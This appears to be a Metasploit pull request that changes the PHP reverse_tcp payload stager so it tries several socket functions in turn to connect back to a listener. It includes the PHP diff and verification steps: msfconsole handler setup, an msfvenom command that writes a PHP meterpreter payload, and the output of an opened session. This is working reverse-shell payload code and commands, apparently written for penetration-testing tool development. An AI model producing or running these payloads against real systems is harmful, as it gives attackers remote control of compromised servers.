### PR TITLE
Try all callable methods when creating socket

### DIFF
--- a/lib/msf/core/payload/php/reverse_tcp.rb
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -60,15 +60,18 @@ $port = #{opts[:port]};
 if (($f = 'stream_socket_client') && is_callable($f)) {
 	$s = $f("tcp://{$ip}:{$port}");
 	$s_type = 'stream';
-} elseif (($f = 'fsockopen') && is_callable($f)) {
+}
+if (!$s && ($f = 'fsockopen') && is_callable($f)) {
 	$s = $f($ip, $port);
 	$s_type = 'stream';
-} elseif (($f = 'socket_create') && is_callable($f)) {
+}
+if (!$s && ($f = 'socket_create') && is_callable($f)) {
 	$s = $f(#{ipf}, SOCK_STREAM, SOL_TCP);
 	$res = @socket_connect($s, $ip, $port);
 	if (!$res) { die(); }
 	$s_type = 'socket';
-} else {
+}
+if (!$s_type) {
 	die('no socket funcs');
 }
 if (!$s) { die('no socket'); }

--- a/modules/payloads/stagers/php/reverse_tcp.rb
+++ b/modules/payloads/stagers/php/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 951
+  CachedSize = 966
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp

--- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 1125
+  CachedSize = 1140
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp


### PR DESCRIPTION
Fixes #8673 

The php/meterpreter/reverse_tcp payload searches through a list of three possible methods for establishing a connection back to LHOST. Once it finds a callable method, if the method fails to establish a connection, the payload bails out. 

This patch changes that behavior so that the payload will try each callable method in the list until one of them establishes a connection. Only if all callable methods fail will the payload error out.

The actual calls to establish connections have not been changed, only the logic for handling errors.

## Verification

Use exploit/multi/handler with php/meterpreter/reverse_tcp as the payload

```
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.24.10
lhost => 192.168.24.10
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse TCP handler on 192.168.24.10:4444
[*] Starting the payload handler...

msf exploit(handler) >
```

Then generate a PHP meterpreter payload and execute it. 

```
tools [~/opt/metasploit-framework]: ./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.24.10 LPORT=4444 -o /tmp/10-4444.php                      
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 964 bytes
Saved as: /tmp/10-4444.php
tools [~/opt/metasploit-framework]: php /tmp/10-4444.php 
/*        
```

You should see a new session:

```
msf exploit(handler) >
[*] Sending stage (34599 bytes) to 192.168.24.10
[*] Meterpreter session 3 opened (192.168.24.10:4444 -> 192.168.24.10:47830) at 2017-07-09 11:36:41 -0700

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information             Connection
  --  ----                   -----------             ----------
  3   meterpreter php/linux  dfarrow (1000) @ tools  192.168.24.10:4444 -> 192.168.24.10:47830 (192.168.24.10)

msf exploit(handler) >
```